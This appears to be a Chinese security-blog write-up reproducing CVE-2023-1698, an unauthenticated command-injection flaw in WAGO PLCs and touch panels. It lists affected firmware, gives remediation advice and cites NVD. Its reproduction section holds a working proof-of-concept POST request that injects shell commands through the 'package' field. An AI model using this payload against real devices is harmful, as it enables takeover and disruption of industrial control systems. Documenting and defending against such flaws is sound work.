Skip to content

Latest commit

 

History

History
225 lines (81 loc) · 3.56 KB

[弥天安全实验室]-2023-10-19-【成功复现】WAGO系统远程代码执行漏洞(CVE-2023-1698).md

File metadata and controls

225 lines (81 loc) · 3.56 KB

【成功复现】WAGO系统远程代码执行漏洞(CVE-2023-1698)

原创 弥天安全实验室 弥天安全实验室

弥天安全实验室

微信号 gh_41292c8e5379

功能介绍 学海浩茫,予以风动,必降弥天之润!


__发表于

收录于合集

#CVE 65 个

#POC 64 个

#网络安全 93 个

#复现 76 个

#漏洞 104 个

网安引领时代,弥天点亮未来


0x00写在前面

** 本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!**


0x01漏洞介绍

WAGO是一家专业从事电气互连、自动化和接口电子技术的公司。

在 WAGO 的多个产品中,一个漏洞允许未经身份验证的远程攻击者创建新用户并更改设备配置,可能导致意远程RCE、拒绝服务等使整个系统受损。


0x02影响版本

751-9301 Compact Controller CC100 FW20 <= FW22

751-9301 Compact Controller CC100 FW23

752-8303/8000-002 Edge Controller FW22

750-81xx/xxx-xxx PFC100 FW20 <= FW22

750-81xx/xxx-xxx PFC100 FW23

750-82xx/xxx-xxx PFC200 FW20 <= FW22

750-82xx/xxx-xxx PFC200 FW23

762-5xxx Touch Panel 600 Advanced Line FW22

762-6xxx Touch Panel 600 Marine Line FW22

762-4xxx Touch Panel 600 Standard Line FW22


0x03漏洞复现

1.访问漏洞环境

2.对漏洞进行复现

POC (POST)

漏洞复现

    POST请求,注入命令执行函数并进行base64编码

POST /wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php HTTP/1.1Host: 127.0.0.0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Connection: closeContent-Length: 19Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflate  
{"package":";id;#"}

   id命令执行成功

  ls命令执行成功

3.nuclei测试(漏洞存在)


0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

1.使用一般安全最佳实践来保护系统免受本地和网络攻击。

2.不允许从不受信任的网络直接访问设备。

3.根据章节解决方案中的表格更新到最新固件。

4.工业控制系统 (ICS) 不应直接从 Internet 访问,而应通过始终如一地应用纵深防御策略加以保护。

https://nvd.nist.gov/vuln/detail/CVE-2023-1698

弥天简介

学海浩茫,予以风动,必降弥天之润!弥天弥天安全实验室成立于2019年2月19日,主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子,也是民间组织。主要以技术共享、交流等不断赋能自己,赋能安全圈,为网络安全发展贡献自己的微薄之力。

口号 网安引领时代,弥天点亮未来

知识分享完了

喜欢别忘了关注我们哦~

学海浩茫,予以风动,必降弥天之润!

弥 天

安全实验室

预览时标签不可点

微信扫一扫
关注该公众号

知道了

微信扫一扫
使用小程序


取消 允许


取消 允许

: , 。 视频 小程序 赞 ,轻点两下取消赞 在看 ,轻点两下取消在看